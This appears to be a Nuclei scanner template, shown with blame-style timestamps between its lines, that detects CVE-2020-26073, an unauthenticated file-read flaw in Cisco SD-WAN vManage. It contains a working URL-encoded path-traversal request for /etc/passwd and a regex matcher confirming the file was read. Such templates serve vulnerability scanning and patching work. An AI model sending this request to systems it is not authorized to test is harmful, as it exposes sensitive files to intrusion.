2021-03-11 10:37:37 +00:00
id : CVE-2020-26073
2022-04-22 10:38:41 +00:00
2021-02-17 19:37:37 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Cisco SD-WAN vManage Software - Local File Inclusion
2021-02-17 19:37:37 +00:00
author : madrobot
severity : high
2021-03-15 17:27:01 +00:00
description : |
2022-07-26 13:45:11 +00:00
Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to read sensitive files on the affected system.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest security patches provided by Cisco to fix the vulnerability.
2021-03-15 18:22:42 +00:00
reference :
2021-03-15 17:27:01 +00:00
- https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
2022-07-26 13:45:11 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
2022-04-01 08:51:42 +00:00
classification :
cve-id : CVE-2020-26073
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-08-31 11:46:18 +00:00
tags : cve,cve2020,cisco,lfi
2021-02-17 19:37:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-17 19:37:37 +00:00
- method : GET
path :
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
2023-08-31 11:46:18 +00:00
2021-02-17 19:37:37 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
2023-08-31 11:46:18 +00:00
2021-02-17 19:37:37 +00:00
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-02-17 19:37:37 +00:00
part : body
2023-10-20 11:41:13 +00:00
2023-12-05 09:50:33 +00:00
# digest: 4b0a0048304602210093b5325073f2c8cc6afd564686b47d297156183c850c1bd644f37e142ab542cf022100df13c84724cfdc148ed72097e25053bc533f89889ef1eecf91d114ba505f5673:922c64590222798bb761d5b6d8e72950
